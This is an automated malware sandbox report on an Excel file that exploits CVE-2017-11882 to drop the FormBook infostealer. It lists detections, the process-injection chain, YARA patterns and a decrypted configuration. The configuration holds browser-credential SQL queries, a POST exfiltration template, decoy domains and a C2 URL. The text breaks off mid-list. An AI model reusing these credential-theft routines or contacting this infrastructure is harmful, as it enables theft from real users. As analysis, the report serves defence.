Play interactive tour

Edit tour

Analysis Report NEW 01 13 2021.xlsx

Overview

General Information

Sample Name:	NEW 01 13 2021.xlsx
Analysis ID:	339199
MD5:	9aa0898ded04a2ee18d7b0074413ac94
SHA1:	59c525a0dd116c9f7ec4b5773a7131ef49a29ad9
SHA256:	d6823f8eaf8a072000df7cc5811f35e58f63182657c67f7d99874d7f534851e8
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2812 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)

vbc.exe (PID: 2732 cmdline: C:\Users\Public\vbc.exe MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)

vbc.exe (PID: 2752 cmdline: C:\Users\Public\vbc.exe MD5: 6A763ED09B2FD9F663BCB0AF7B17D492)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

chkdsk.exe (PID: 1772 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)

cmd.exe (PID: 1840 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fundamentaliemef.com", "gallerybrows.com", "leadeligey.com", "octoberx2.online", "climaxnovels.com", "gdsjgf.com", "curateherstories.com", "blacksailus.com", "yjpps.com", "gmobilet.com", "fcoins.club", "foreverlive2027.com", "healthyfifties.com", "wmarquezy.com", "housebulb.com", "thebabyfriendly.com", "primajayaintiperkasa.com", "learnplaychess.com", "chrisbubser.digital", "xn--avenr-wsa.com", "exlineinsurance.com", "thrivezi.com", "tuvandadayvitos24h.online", "illfingers.com", "usmedicarenow.com", "pandabutik.com", "engageautism.info", "magnabeautystyle.com", "texasdryroof.com", "woodlandpizzahartford.com", "dameadamea.com", "sedaskincare.com", "ruaysatu99.com", "mybestaide.com", "nikolaichan.com", "mrcabinetkitchenandbath.com", "ondemandbarbering.com", "activagebenefits.net", "srcsvcs.com", "cbrealvitalize.com", "ismaelworks.com", "medkomp.online", "ninasangtani.com", "h2oturkiye.com", "kolamart.com", "acdfr.com", "twistedtailgatesweeps1.com", "ramjamdee.com", "thedancehalo.com", "joeisono.com", "glasshouseroadtrip.com", "okcpp.com", "riggsfarmfenceservices.com", "mgg360.com", "xn--oi2b190cymc.com", "ctfocbdwholesale.com", "openspiers.com", "rumblingrambles.com", "thepoetrictedstudio.com", "magiclabs.media", "wellnesssensation.com", "lakegastonautoparts.com", "dealsonwheeeles.com", "semenboostplus.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.rizrvd.com/bw82/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2fcd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30062:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3bd75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3b861:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3be77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3bfef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x985a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x30a7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x138bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3aadc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x317f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19c47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x40e67:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1acea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16b79:$sqlite3step: 68 34 1C 7B E1 0x16c8c:$sqlite3step: 68 34 1C 7B E1 0x3dd99:$sqlite3step: 68 34 1C 7B E1 0x3deac:$sqlite3step: 68 34 1C 7B E1 0x16ba8:$sqlite3text: 68 38 2A 90 C5 0x16ccd:$sqlite3text: 68 38 2A 90 C5 0x3ddc8:$sqlite3text: 68 38 2A 90 C5 0x3deed:$sqlite3text: 68 38 2A 90 C5 0x16bbb:$sqlite3blob: 68 53 D8 7F 8C 0x16ce3:$sqlite3blob: 68 53 D8 7F 8C 0x3dddb:$sqlite3blob: 68 53 D8 7F 8C 0x3df03:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2812	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
6.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2512, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2812

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 18.195.87.136, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 6.2.vbc.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", 